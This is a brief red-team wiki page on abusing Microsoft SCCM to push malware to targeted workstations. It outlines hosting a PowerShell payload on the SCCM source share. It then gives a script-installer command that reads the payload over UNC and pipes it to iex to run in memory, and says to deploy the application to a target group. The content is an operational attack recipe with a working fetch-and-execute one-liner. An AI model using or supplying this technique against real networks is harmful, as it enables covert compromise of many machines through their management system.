BuyMeACoffee

Malware Deployment

Compromise

  • Create an application/package that utilizes PowerShell for payload deliery and execution

    • Create a PowerShell payload and throw it up on the public share SCCM uses (i.e. sccmsource)

LogoTargeted Workstation Compromise with SCCMenigma0x3
Tutorial

  • Create a Script installer application to fetch and execute your payload :

    • cmd.exe /c "powershell.exe -c "gc \\serverName\sharedFolder\ApplicationFolder\payload.txt | iex""

  • Deploy the application to your target group and wait for the SCCM agents to check in

    • Payload is fetched over UNC and runs in memory

Sources

Red Team upgrades using SCCM for Malware Deployment - SlideShare

PreviousLateral MovementNextBasics

Last updated

Was this helpful?